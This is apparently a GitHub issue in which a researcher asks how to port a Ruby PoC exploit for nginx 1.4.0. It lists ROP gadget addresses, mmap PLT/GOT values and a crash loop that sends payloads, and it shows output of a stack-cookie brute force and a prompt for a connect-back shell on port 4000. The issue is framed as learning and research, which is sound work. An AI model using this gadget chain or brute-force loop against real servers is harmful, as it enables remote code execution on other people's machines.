nginx-1.4.0

Questions on the provided exploit script

Open jjang3 opened this issue 1 year ago • 0 comments

Hello, first of all, thank you very much for releasing this PoC for researchers to try and learn how the exploit works.

I have been trying to get this exploit working for the latest version of ronin, but I just wanted to get a few clarifications as I'm trying to update the script to see whether I can get it working.

Inside the script, this information is needed:

# rop address taken from nginx binary (find in the repo)
poprdi = 0x00427006
poprsi = 0x0043a00e
poprdx = 0x0041b8fa
poprax = 0x00442c80

mmap64   = 0x4029b0
mmapgot  = 0x67f290
mmapaddr = 0x00410000

rsito_rax_ = 0x0042afcb
add_rdi_al = 0x00462de4

So the first six are relatively simple to find for my own built binary using objdump and ROPgadget, as follows:

poprdi = 0x495f7     # [+] Gadget found: 0x495f7 pop rdi ; ret
poprsi = 0x4cf1b     # [+] Gadget found: 0x4cf1b pop rsi ; ret
poprdx = 0x17f013    # [+] Gadget found: 0x17f013 pop rdx ; ret
poprax = 0xdd823     # [+] Gadget found: 0xdd823 pop rax ; ret

mmap64   = 0x48110   # (From objdump) 0000000000048110 <mmap64@plt>:
mmapgot  = 0x2ad088  # 48110:	ff 25 72 4f 26 00    	jmpq   *0x264f72(%rip)        # 2ad088 <mmap64@GLIBC_2.2.5>

So now my question is, what is the mmapaddr variable for? I tried objdump on the provided nginx executable in the repository, but could not find anything at the address 0x410000.

Furthermore, just to verify, do these two variables represent the following assembly code?

rsito_rax_ =   #   4b08d:	48 89 f0             	mov    %rsi,%rax
add_rdi_al =   #   add    %rdi,%al

I found something that looks like rsito_rax, but I could not find anything for add_rdi_al, so I'm guessing the assembly instruction for this one.

Lastly, in the crash function, I noticed that the code is written as

  5.times do
    tcp_session(ARGV[0],ARGV[1].to_i) do |s|
      $count += 1
      s.send(payload, 0)
      data = s.recv(10)
    end

    return true if data.strip.empty?
  end

I have realized that tcp_session is deprecated in the latest version of ronin. Therefore, I attempted to update this using tcp_connect, so it would look something like this:

  5.times do
    tcp_connect(ARGV[0],ARGV[1].to_i) do |s|
      $count += 1
      s.send(payload, 0)
      data = s.recv(10)
    end

    return true if data.strip.empty?
  end

Would this be correct?

When I try to execute the exploit with my updated changes above, it looks something like this:

~/Downloads/nginx-1.4.0 (master*) » ruby exp-nginx.rb 127.0.0.1 8080    1 ↵ jaewon@mir3
[*] searching for byte: 1
1
[*] searching for byte: 2
1
[*] searching for byte: 3
1
[*] searching for byte: 4
1
[*] searching for byte: 5
1
[*] searching for byte: 6
1
[*] searching for byte: 7
1
[*] Found cookie: \x00\x01\x01\x01\x01\x01\x01\x01 8
[*] PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT 0.0.0.0 4000

[*] 36 connections

And I cannot get anything after running nc -lvvv 4000, which means I am probably doing something wrong in my script.

Thank you in advance for any suggestions!

jjang3, Mar 15 '23 01:03